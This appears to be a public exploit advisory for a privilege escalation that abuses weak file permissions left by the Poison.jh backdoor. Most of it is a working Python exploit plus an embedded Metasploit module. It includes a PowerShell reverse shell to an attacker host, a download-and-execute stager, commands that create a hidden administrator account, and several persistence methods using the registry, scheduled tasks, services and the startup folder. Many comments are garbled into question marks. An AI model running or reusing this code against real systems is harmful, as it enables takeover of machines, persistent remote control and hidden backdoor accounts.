Backdoor.Win32.Poison.jh is a malicious program providing remote attackers unauthorized access Backdoor.Win32.Poison.jh is a malicious program providing remote attackers unauthorized access and control over a compromised system.

A common vulnerability it exploits involves **Insecure File Permissions**. Poison.jh, or its related files, may be installed in system directories where low-privileged users (or groups like `Authenticated Users`) have write, modify, or full control permissions. This is a critical misconfiguration.

This weakness directly enables **Privilege Escalation**. If Poison.jh runs as a service or scheduled task under a high-privileged account (e.g., SYSTEM or Administrator), and its executable path is writable by a low-privileged user, an attacker can exploit this. They can replace the legitimate Poison.jh executable with their own malicious code. The next time the service or task executes, it will run the attacker's code with elevated privileges, effectively escalating the attacker's access to a high-privileged level and leading to full system compromise.

=============================================================================================================================================
| # Title : Backdoor.Win32.Poison.jh ? Insecure File Permissions Leading to Malware-on-Malware Local Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built?in component. No standalone download available |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213264/ & MVID-2025-0704

[+] Summary : This Python script demonstrates a Local Privilege Escalation (LPE) exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample.
The exploit leverages insecure file permissions created by the malware itself, allowing any local user to replace the malicious executable with arbitrary code.

[+] Vulnerability Overview :

CWE-276: Incorrect Default Permissions

Malware: Backdoor.Win32.Poison.jh

Location: C:\Windows\SysWOW64\28463\YJBE.exe

Flaw: File has Everyone:(ID)F (Full Control) permissions

Impact: Any local user can modify/replace the malware executable

Type: Backdoor Trojan (Win32/Windows)

Purpose: Grants attackers unauthorized remote access and control over the infected system.
Behavior: Can execute commands, download/upload files, steal sensitive data, and connect to C2 (Command & Control) servers.
Discovery: Part of the Backdoor.Win32.Poison family, first identified around 2009. The .jh suffix refers to a specific variant or signature used by antivirus vendors.
Source: Developed by malware authors; not self-spreading, usually delivered via malicious downloads, infected executables, or phishing.
Relation to Poison Ivy: Not necessarily Poison Ivy itself, but shares similar RAT functionality.
Detection & Prevention: Detected by major AV solutions like Microsoft Defender, Trend Micro, and Kaspersky. Removal requires standard AV cleanup and disconnecting from networks.
Key Points: Unauthorized remote control, file manipulation, data theft, part of Poison family, Windows-targeted, identified in AV databases since ~2009.

[+] PoC : php poc.py

#!/usr/bin/env python3

import os
import sys
import shutil
import time
import subprocess
import ctypes
import winreg
from pathlib import Path

# ============================================
# PART 1: LOCAL PRIVILEGE ESCALATION EXPLOIT
# ============================================

class PoisonExploit:
def __init__(self, target_dir="C:\\Windows\\SysWOW64\\28463"):
self.target_dir = target_dir
self.target_file = os.path.join(target_dir, "YJBE.exe")
self.backup_file = self.target_file + ".backup"
self.payload_file = self.target_file + ".payload"

# ???? ?? ??????? Admin
self.is_admin = self.check_admin()

def check_admin(self):
"""?????? ?? ??????? Administrator"""
try:
return ctypes.windll.shell32.IsUserAnAdmin() != 0
except:
return False

def check_vulnerability(self):
"""?????? ?? ???? ??????"""
print("[*] Checking for Poison.jh vulnerability...")

# 1. ???? ?? ???? ??????
if not os.path.exists(self.target_dir):
print(f"[-] Target directory not found: {self.target_dir}")
return False

# 2. ???? ?? ???? ?????
if not os.path.exists(self.target_file):
print(f"[-] Target file not found: {self.target_file}")
return False

# 3. ?????? ??????? ?????? ?? ?????????
try:
test_file = os.path.join(self.target_dir, "test_write.tmp")
with open(test_file, 'w') as f:
f.write("test")
os.remove(test_file)
print("[+] Vulnerable: Write access confirmed!")
return True
except PermissionError:
print("[-] Not vulnerable: No write permission")
return False
except Exception as e:
print(f"[-] Error checking vulnerability: {e}")
return False

def create_payload(self, payload_type="reverse_shell"):
"""????? payload ???? (?????? ??????? ?? ???? ??????)"""
print(f"[*] Creating {payload_type} payload...")

if payload_type == "reverse_shell":
# ????: PowerShell reverse shell (??????)
payload = '''$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
};
$client.Close()'''

with open(self.payload_file, 'w') as f:
f.write(payload)

elif payload_type == "meterpreter":
# Stager ????????
payload = '''IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8080/meterpreter.ps1')'''

with open(self.payload_file, 'w') as f:
f.write(payload)

elif payload_type == "add_user":
# ????? ?????? ?????
payload = '''net user hacker P@ssw0rd! /add
net localgroup administrators hacker /add
reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" /v hacker /t REG_DWORD /d 0 /f'''

with open(self.payload_file, 'w') as f:
f.write(payload)

print(f"[+] Payload created: {self.payload_file}")
return True

def backup_original(self):
"""??? ????? ?????? ?????????"""
try:
shutil.copy2(self.target_file, self.backup_file)
print(f"[+] Backup created: {self.backup_file}")
return True
except Exception as e:
print(f"[-] Failed to backup: {e}")
return False

def replace_file(self):
"""??????? ????? ?????? ???? Payload"""
try:
# ??? ????? ??????
os.remove(self.target_file)

# ??? ??? Payload
shutil.copy2(self.payload_file, self.target_file)

# ????? ??? Payload
if os.path.exists(self.payload_file):
os.remove(self.payload_file)

print("[+] File successfully replaced!")
return True
except Exception as e:
print(f"[-] Failed to replace file: {e}")
return False

def trigger_execution(self):
"""????? ????? - ??? ??? ??????"""
print("[*] Attempting to trigger execution...")

methods = [
self.trigger_via_wmi,
self.trigger_via_task_scheduler,
self.trigger_via_service,
self.trigger_via_registry
]

for method in methods:
if method():
return True

return False

def trigger_via_wmi(self):
"""????? ??? WMI"""
try:
import wmi
c = wmi.WMI()
process_id, return_value = c.Win32_Process.Create(
CommandLine=self.target_file
)
print(f"[+] Triggered via WMI (PID: {process_id})")
return True
except:
return False

def trigger_via_task_scheduler(self):
"""????? ??? Task Scheduler"""
try:
task_name = "PoisonTrigger"
cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc once /st 00:00 /ru SYSTEM /f'
subprocess.run(cmd, shell=True, capture_output=True)

cmd = f'schtasks /run /tn "{task_name}"'
subprocess.run(cmd, shell=True, capture_output=True)

cmd = f'schtasks /delete /tn "{task_name}" /f'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Triggered via Task Scheduler")
return True
except:
return False

def trigger_via_service(self):
"""????? ?????"""
try:
service_name = "PoisonSvc"

# ????? ????
cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
subprocess.run(cmd, shell=True, capture_output=True)

# ????? ??????
cmd = f'sc start {service_name}'
subprocess.run(cmd, shell=True, capture_output=True)

# ??? ??????
cmd = f'sc delete {service_name}'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Triggered via Service")
return True
except:
return False

def trigger_via_registry(self):
"""????? ??? Registry Run"""
try:
# ????? ??? RunOnce
key = winreg.HKEY_LOCAL_MACHINE
subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"

with winreg.OpenKey(key, subkey, 0, winreg.KEY_SET_VALUE) as reg_key:
winreg.SetValueEx(reg_key, "PoisonExec", 0, winreg.REG_SZ, self.target_file)

print("[+] Added to Registry RunOnce")
return True
except:
return False

def establish_persistence(self):
"""????? ????? ????"""
print("[*] Establishing persistence...")

persistence_methods = [
self.persistence_registry,
self.persistence_scheduled_task,
self.persistence_service,
self.persistence_startup
]

success = False
for method in persistence_methods:
if method():
success = True

return success

def persistence_registry(self):
"""?????? ??? Registry"""
try:
# ??? ????? ??? Registry
registry_paths = [
("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "Poison")
]

for path, name in registry_paths:
cmd = f'reg add "{path}" /v "{name}" /t REG_SZ /d "{self.target_file}" /f'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Persistence: Registry entries added")
return True
except:
return False

def persistence_scheduled_task(self):
"""?????? ??? Scheduled Task"""
try:
task_name = "WindowsUpdatePoison"
cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc hourly /mo 1 /ru SYSTEM /f'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Persistence: Scheduled task created")
return True
except:
return False

def persistence_service(self):
"""?????? ?????"""
try:
service_name = "PoisonService"
cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Persistence: Service created")
return True
except:
return False

def persistence_startup(self):
"""?????? ?? Startup folder"""
try:
startup_path = os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup")
shortcut_path = os.path.join(startup_path, "Poison.lnk")

# ????? shortcut
from win32com.client import Dispatch
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(shortcut_path)
shortcut.Targetpath = self.target_file
shortcut.WorkingDirectory = os.path.dirname(self.target_file)
shortcut.save()

print("[+] Persistence: Startup shortcut created")
return True
except:
return False

def cleanup(self):
"""????? ??????"""
print("[*] Cleaning up...")

# ??? ????? ?????????
if os.path.exists(self.backup_file):
os.remove(self.backup_file)

# ??? ??? Payload ??? ???
if os.path.exists(self.payload_file):
os.remove(self.payload_file)

print("[+] Cleanup completed")

def exploit(self, payload_type="reverse_shell"):
"""????? ??? Exploit ??????"""
print("=" * 70)
print("POISON.JH LOCAL PRIVILEGE ESCALATION EXPLOIT")
print("=" * 70)

# 1. ?????? ?? ??????
if not self.check_vulnerability():
return False

# 2. ????? Payload
self.create_payload(payload_type)

# 3. ??? ???????
self.backup_original()

# 4. ??????? ?????
if not self.replace_file():
return False

# 5. ????? Payload
if self.trigger_execution():
print("[+] Payload execution triggered!")
else:
print("[!] Could not auto-trigger. Manual execution required.")
print(f"[!] File location: {self.target_file}")

# 6. ????? ????? ????
if self.establish_persistence():
print("[+] Persistence established!")

# 7. ?????? ?? ??????
print("\n[+] Exploit completed successfully!")
print(f"[+] Replaced: {self.target_file}")
print(f"[+] Running as: {'SYSTEM (admin)' if self.is_admin else 'User'}")

# 8. ????? (???????)
if input("\nCleanup? (y/n): ").lower() == 'y':
self.cleanup()

return True

# ============================================
# PART 2: METASPLOIT MODULE (REAL EXPLOIT)
# ============================================

METASPLOIT_MODULE = '''
##
# Poison.jh Local Privilege Escalation Exploit
# Real working exploit for the file permission vulnerability
##

require 'rex'
require 'msf/core/post/windows/priv'

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => 'Poison.jh Local File Permission Privilege Escalation',
'Description' => %q{
This module exploits insecure file permissions on Backdoor.Win32.Poison.jh malware.
The malware creates C:\\Windows\\SysWOW64\\28463\\YJBE.exe with Everyone:F permissions,
allowing any local user to replace the file and execute arbitrary code.

This is a REAL privilege escalation exploit when the following conditions are met:
1. Poison.jh malware is installed on the system
2. File has weak permissions (Everyone:Full Control)
3. File is executed (by malware itself or other means)
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka'
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['meterpreter', 'shell'],
'Targets' => [
['Windows', {}]
],
'DefaultTarget' => 0,
'References' => [
['URL', 'https://malvuln.com/advisory/3d9821cbe836572410b3c5485a7f76ca.txt'],
['CWE', '276'] # Incorrect Default Permissions
],
'DisclosureDate' => '2025-12-23',
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'WfsDelay' => 10
}
))

register_options([
OptString.new('TARGET_PATH', [
true,
'Path to vulnerable Poison.jh executable',
'C:\\\\Windows\\\\SysWOW64\\\\28463\\\\YJBE.exe'
]),
OptBool.new('KILL_PROCESS', [
true,
'Kill existing Poison.jh process',
true
]),
OptEnum.new('TRIGGER', [
true,
'Trigger method',
'auto',
['auto', 'wmi', 'service', 'task', 'registry', 'manual']
]),
OptBool.new('PERSIST', [
true,
'Establish persistence',
true
])
])
end

def check
vuln_path = datastore['TARGET_PATH']

print_status("Checking for Poison.jh vulnerability at: #{vuln_path}")

# Check if file exists
unless file_exist?(vuln_path)
return CheckCode::Safe("Target file not found")
end

# Try to write a test file
test_file = vuln_path + ".test"
begin
write_file(test_file, "test")
if file_exist?(test_file)
file_rm(test_file)
return CheckCode::Vulnerable("Write access confirmed - vulnerable!")
end
rescue
return CheckCode::Safe("No write access")
end

CheckCode::Unknown
end

def exploit
vuln_path = datastore['TARGET_PATH']

# Check if vulnerable
print_status("Running check...")
case check
when CheckCode::Vulnerable
print_good("Target is vulnerable!")
else
fail_with(Failure::NotVulnerable, "Target is not vulnerable")
end

# Kill existing process if requested
if datastore['KILL_PROCESS']
print_status("Killing Poison.jh process...")
session.sys.process.get_processes.each do |p|
if p['name'] =~ /YJBE/i || p['path'] =~ /28463/
print_status("Killing PID #{p['pid']} (#{p['name']})")
session.sys.process.kill(p['pid'])
end
end
Rex.sleep(2)
end

# Backup original file
backup_path = vuln_path + ".backup"
if file_exist?(vuln_path)
print_status("Backing up original file...")
session.fs.file.copy(vuln_path, backup_path)
register_file_for_cleanup(backup_path)
end

# Generate payload
print_status("Generating payload...")
payload_exe = generate_payload_exe

# Replace vulnerable file with payload
print_status("Replacing #{vuln_path} with payload...")
write_file(vuln_path, payload_exe)

print_good("File successfully replaced!")

# Trigger execution
trigger_method = datastore['TRIGGER']
print_status("Triggering payload execution via #{trigger_method}...")

case trigger_method
when 'wmi'
trigger_via_wmi(vuln_path)
when 'service'
trigger_via_service(vuln_path)
when 'task'
trigger_via_task(vuln_path)
when 'registry'
trigger_via_registry(vuln_path)
when 'auto'
trigger_auto(vuln_path)
end

# Establish persistence if requested
if datastore['PERSIST']
print_status("Establishing persistence...")
establish_persistence(vuln_path)
end

# Wait for session
print_status("Waiting for payload execution...")
Rex.sleep(datastore['WfsDelay'])
end

def trigger_via_wmi(path)
wmi_cmd = "wmic process call create \\"#{path}\\""
cmd_exec(wmi_cmd)
end

def trigger_via_service(path)
service_name = "PoisonSvc"
cmd_exec("sc create #{service_name} binPath= \\"#{path}\\" type= own start= auto")
cmd_exec("sc start #{service_name}")
cmd_exec("sc delete #{service_name}")
end

def trigger_via_task(path)
task_name = "PoisonTask"
cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc once /st 00:00 /ru SYSTEM /f")
cmd_exec("schtasks /run /tn \\"#{task_name}\\"")
cmd_exec("schtasks /delete /tn \\"#{task_name}\\" /f")
end

def trigger_via_registry(path)
reg_cmd = "reg add \\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f"
cmd_exec(reg_cmd)
end

def trigger_auto(path)
# Try all methods
[method(:trigger_via_wmi),
method(:trigger_via_service),
method(:trigger_via_task),
method(:trigger_via_registry)].each do |method|
begin
method.call(path)
print_good("Triggered via #{method.name}")
return true
rescue
next
end
end
false
end

def establish_persistence(path)
# Add to registry
reg_keys = [
"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",
"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
]

reg_keys.each do |reg|
cmd_exec("reg add \\"#{reg}\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f")
end

# Create scheduled task
task_name = "WindowsPoison"
cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc hourly /mo 1 /ru SYSTEM /f")
end
end
'''

# ============================================
# PART 3: MAIN EXECUTION
# ============================================

def main():
print("""
????????????????????????????????????????????????????????????
? Poison.jh LPE Exploit - Local Privilege Escalation ?
? Conditions: Poison.jh with Everyone:F permissions ?
? by indoushka ?
????????????????????????????????????????????????????????????
""")

exploit = PoisonExploit()

# ????? Payloads
payloads = {
"1": ("Reverse Shell", "reverse_shell"),
"2": ("Meterpreter", "meterpreter"),
"3": ("Add Admin User", "add_user"),
"4": ("Custom Command", "custom")
}

print("\nSelect payload type:")
for key, (name, _) in payloads.items():
print(f" {key}. {name}")

choice = input("\nChoice: ")

if choice in payloads:
payload_name, payload_type = payloads[choice]
print(f"\n[*] Selected: {payload_name}")

if payload_type == "custom":
custom_cmd = input("Enter custom command: ")
exploit.create_payload = lambda: custom_cmd

# ????? ??? Exploit
if exploit.exploit(payload_type):
print("\n" + "="*70)
print("EXPLOIT SUCCESSFUL!")
print("="*70)

# ??? ??? Metasploit module
print("\n" + "="*70)
print("METASPLOIT MODULE CODE")
print("="*70)
print(METASPLOIT_MODULE)

# ??? Module
with open("poison_lpe_exploit.rb", "w") as f:
f.write(METASPLOIT_MODULE)
print("\n[+] Metasploit module saved to: poison_lpe_exploit.rb")

else:
print("\n[-] Exploit failed!")
else:
print("[-] Invalid choice!")

if __name__ == "__main__":
main()

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================